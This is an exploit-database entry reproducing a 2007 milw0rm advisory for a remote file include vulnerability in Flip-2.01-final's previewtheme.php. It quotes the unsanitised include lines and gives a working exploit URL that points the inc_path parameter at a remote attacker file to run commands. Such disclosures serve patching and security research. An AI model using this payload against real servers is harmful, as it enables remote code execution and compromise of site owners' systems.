header-logo
Suggest Exploit
vendor:
Flip-2.01-final
by:
GolD_M (Mahmnood_ali)
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: Flip-2.01-final
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Flip-2.01-final 1.0 <= Remote File Include Vulnerability

Remote File Include vulnerability in Flip-2.01-final 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the inc_path parameter to previewtheme.php.

Mitigation:

Update to a patched version of Flip-2.01-final or sanitize user input before including files.
Source

Exploit-DB raw data:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Flip-2.01-final 1.0 <=  Remote File Include Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Discovered by GolD_M(Mahmnood_ali) & &  Contact: HackEr_@W.Cn
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
URL:

http://releases.smallaxesolutions.com/flip-2.01.zip
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
V.CODE: In : [path]/previewtheme.php

include($inc_path . "options.php");
include($inc_path . "head.php");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit:

http://Www.Victim.Com/[path]/[path]/previewtheme.php?theme=1&inc_path=Evil.txt?cmd
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanx : ThE dE@Th  & Codebreak & Dr Max Virus & Milw0rm.com & H4cky0u.Com & Google.Com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SpeciaL GreeTz : Tryag.Com & DwRaT.Com & Asb-May.Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# milw0rm.com [2007-02-04]